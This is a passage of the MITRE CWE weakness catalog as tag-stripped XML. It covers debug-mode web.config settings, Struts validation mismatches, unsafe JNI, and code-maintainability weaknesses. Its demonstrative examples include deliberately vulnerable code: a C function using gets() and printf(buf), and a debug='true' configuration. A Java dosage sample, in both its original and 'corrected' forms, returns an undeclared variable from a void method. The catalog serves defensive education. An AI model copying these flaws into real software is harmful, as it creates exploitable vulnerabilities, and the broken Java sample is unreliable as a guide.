Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + System Configuration + Avoid releasing debug binaries into the production environment. Change the debug mode to false when the application is deployed into production. + + + + + The file web.config contains the debug mode setting. Setting debug to "true" will let the browser display debugging information. + + <?xml version="1.0" encoding="utf-8" ?><configuration><system.web><compilationdefaultLanguage="c#"debug="true"/>...</system.web></configuration> + + Change the debug mode to false when the application is deployed into production. + + + + + ASP.NET Misconfiguration: Creating Debug Binary + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-11-24 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Background_Details, Common_Consequences, Demonstrative_Examples, Description, Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Validation fields that do not appear in forms they are associated with indicate that the validation logic is out of date. + + It is easy for developers to forget to update validation logic when they make changes to an ActionForm class. One indication that validation logic is not being properly maintained is inconsistencies between the action form and the validation form. + Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. + + + + + + + + Primary + + + + + + + + Implementation + + + Operation + + + + + Other + Other + It is critically important that validation logic be maintained and kept in sync with the rest of the application. Unchecked input is the root cause of some of today's worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation. + + + + + Automated Static Analysis + To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files. + Moderate + + + Manual Static Analysis + To find the issue in the implementation, manual checks or automated static analysis could be applied to the XML configuration files. + Moderate + + + + + This example shows an inconsistency between an action form and a validation form. with a third field. + This first block of code shows an action form that has two fields, startDate and endDate. + + public class DateRangeForm extends ValidatorForm { + String startDate, endDate; + public void setStartDate(String startDate) {this.startDate = startDate;} + public void setEndDate(String endDate) {this.endDate = endDate;} + } + + This second block of related code shows a validation form with a third field: scale. The presence of the third field suggests that DateRangeForm was modified without taking validation into account. + + <form name="DateRangeForm"><field property="startDate" depends="date"><arg0 key="start.date"/></field><field property="endDate" depends="date"><arg0 key="end.date"/></field><field property="scale" depends="integer"><arg0 key="range.scale"/></field></form> + + + + + + Struts: Validator Without Form Field + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Common_Consequences, Description, Other_Notes + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Demonstrative_Examples, Detection_Factors, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product or code does not isolate system-dependent + functionality into separate standalone modules. + This issue makes it more difficult to maintain and/or port the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses automatically-generated code that cannot be + executed without a specific runtime support component. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code uses a data representation that relies on low-level + data representation or constructs that may vary across different processors, + physical machines, OSes, or other physical components. + This issue makes it more difficult to maintain and/or port the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product relies on third-party components that do + not provide equivalent functionality across all desirable + platforms. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product relies on third-party components that are not + actively supported or maintained by the original developer or a trusted proxy + for the original developer. + Reliance on components that are no longer maintained can make it difficult or impossible to fix significant bugs, vulnerabilities, or quality issues. In effect, unmaintained code can become obsolete. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated References, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product or code uses machine-dependent functionality, but + it does not sufficiently encapsulate or isolate this functionality from + the rest of the code. + This issue makes it more difficult to port or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code uses literal constants that may need to change + or evolve over time, instead of using symbolic constants. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code uses symbolic constants, but it does not + sufficiently place the definitions of these constants into a more centralized or + isolated location. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code is structured in a way that relies too much on using + or setting global variables throughout various points in the code, instead of + preserving the associated information in a narrower, more local + context. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code contains a callable, block, or other code element in + which the same variable is used to control more than one unique task or store + more than one instance of data. + Use of the same variable for multiple purposes can make it more difficult for a person to read or understand the code, potentially hiding other quality issues. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + When a Java application uses the Java Native Interface (JNI) to call code written in another programming language, it can expose the application to weaknesses in that code, even if those weaknesses cannot occur in Java. + Many safety features that programmers may take for granted do not apply for native code, so you must carefully review all such code for potential problems. The languages used to implement native code may be more susceptible to buffer overflows and other attacks. Native code is unprotected by the security features enforced by the runtime environment, such as strong typing and array bounds checking. + + + + + + + Primary + + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + Implement error handling around the JNI call. + + + Implementation + Refactoring + Do not use JNI calls if you don't trust the native library. + + + Implementation + Refactoring + Be reluctant to use JNI calls. A Java API equivalent may exist. + + + + + The following code defines a class named Echo. The class declares one native method (defined below), which uses C to echo commands entered on the console back to the user. The following C code defines the native method implemented in the Echo class: + + class Echo { + + public native void runEcho();static { + + System.loadLibrary("echo"); + }public static void main(String[] args) { + + new Echo().runEcho(); + } + } + + + #include <jni.h>#include "Echo.h"//the java class above compiled with javah#include <stdio.h> + JNIEXPORT void JNICALLJava_Echo_runEcho(JNIEnv *env, jobject obj){char buf[64];gets(buf);printf(buf);} + + Because the example is implemented in Java, it may appear that it is immune to memory issues like buffer overflow vulnerabilities. Although Java does do a good job of making memory operations safe, this protection does not extend to vulnerabilities occurring in source code written in other languages that are accessed using the Java Native Interface. Despite the memory protections offered in Java, the C code in this example is vulnerable to a buffer overflow because it makes use of gets(), which does not check the length of its input. + The Sun Java(TM) Tutorial provides the following description of JNI [See Reference]: The JNI framework lets your native method utilize Java objects in the same way that Java code uses these objects. A native method can create Java objects, including arrays and strings, and then inspect and use these objects to perform its tasks. A native method can also inspect and use objects created by Java application code. A native method can even update Java objects that it created or that were passed to it, and these updated objects are available to the Java application. Thus, both the native language side and the Java side of an application can create, update, and access Java objects and then share these objects between them. + The vulnerability in the example above could easily be detected through a source code audit of the native method implementation. This may not be practical or possible depending on the availability of the C source code and the way the project is built, but in many cases it may suffice. However, the ability to share objects between Java and native methods expands the potential risk to much more insidious cases where improper data handling in Java may lead to unexpected vulnerabilities in native code or unsafe operations in native code corrupt data structures in Java. Vulnerabilities in native code accessed through a Java application are typically exploited in the same manner as they are in applications written in the native language. The only challenge to such an attack is for the attacker to identify that the Java application uses native code to perform certain operations. This can be accomplished in a variety of ways, including identifying specific behaviors that are often implemented with native code or by exploiting a system information exposure in the Java application that reveals its use of JNI [See Reference]. + + + + + Unsafe JNI + + + SEC08-J + Define wrappers around native methods + + + JNI01-J + Safely invoke standard APIs that perform tasks using the immediate caller's class loader instance (loadLibrary) + + + JNI00-J + Define wrappers around native methods + Imprecise + + + SFP3 + Use of an improper API + + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Demonstrative_Example, Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2009-10-29 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unsafe JNI + + + + The product's design documentation does not adequately describe + control flow, data flow, system initialization, relationships between tasks, + components, rationales, or other important aspects of the + design. + + + + + + Indirect + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's documentation does not adequately define inputs, + outputs, or system/software interfaces. + + + + + + Indirect + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The document does not fully define all mechanisms that are used + to control or influence how product-specific programs are + executed. + This includes environmental variables, configuration files, registry keys, command-line switches or options, or system settings. + + + + + + Indirect + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code uses comment styles or formats that are + inconsistent or do not follow expected standards for the + product. + This issue makes it more difficult to maintain the product due to insufficient legibility, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code contains whitespace that is inconsistent across + the code or does not follow expected standards for the + product. + This issue makes it more difficult to understand and maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code contains elements such as source files + that do not consistently provide a prologue or header that has been + standardized for the project. + The lack of a prologue can make it more difficult to accurately and quickly understand the associated code. Standard prologues or headers may contain information such as module name, version number, author, date, purpose, function, assumptions, limitations, accuracy considerations, etc. + This issue makes it more difficult to maintain the product due to insufficient analyzability, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code contains comments that do not accurately + describe or explain aspects of the portion of the code with which the comment is + associated. + When a comment does not accurately reflect the associated code elements, this can introduce confusion to a reviewer (due to inconsistencies) or make it more difficult and less efficient to validate that the code is implementing the intended behavior correctly. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + + + + Other + Reduce Maintainability + + + + + Implementation + Verify that each comment accurately reflects what is intended to happen during execution of the code. + + + + + In the following Java example the code performs a calculation to determine how much medicine to administer. A comment is provided to give insight into what the calculation shoud be doing. Unfortunately the comment does not match the actual code and thus leaves the reader to wonder which is correct. + + public class Main { + + public static void main(String[] args) { + + int pt_weight = 83; + int mg_per_kg = 3; + int daily_dose = 0; + + // Add the patient weight and Mg/Kg to calculate the correct daily dose + daily_dose = pt_weight * mg_per_kg; + return dosage; + + } + + } + + In the correction below, the code functionality has been verified, and the comment has been corrected to reflect the proper calculation. + + public class Main { + + public static void main(String[] args) { + + int pt_weight = 83; + int mg_per_kg = 3; + int daily_dose = 0; + + // Multiply the patient weight and Mg/Kg to calculate the correct daily dose + daily_dose = pt_weight * mg_per_kg; + return dosage; + + } + + } + + Note that in real-world code, these values should be validated to disallow negative numbers, prevent integer overflow, etc. + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Drew Buttner + 2022-08-15 + Suggested new demonstrative examples, mitigations, and applicable platforms. + + + + + The code contains a function or method whose signature and/or associated + inline documentation does not sufficiently describe the callable's inputs, outputs, + side effects, assumptions, or return codes. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The documentation does not sufficiently describe the techniques + that are used for error handling, exception processing, or similar + mechanisms. + Documentation may need to cover error handling techniques at multiple layers, such as module, executable, compilable code unit, or callable. + + + + + + Indirect + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code uses too many unconditional branches (such as + "goto"). + This issue makes it more difficult to understand and/or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product accepts XML from an untrusted source but does not validate the XML against the proper 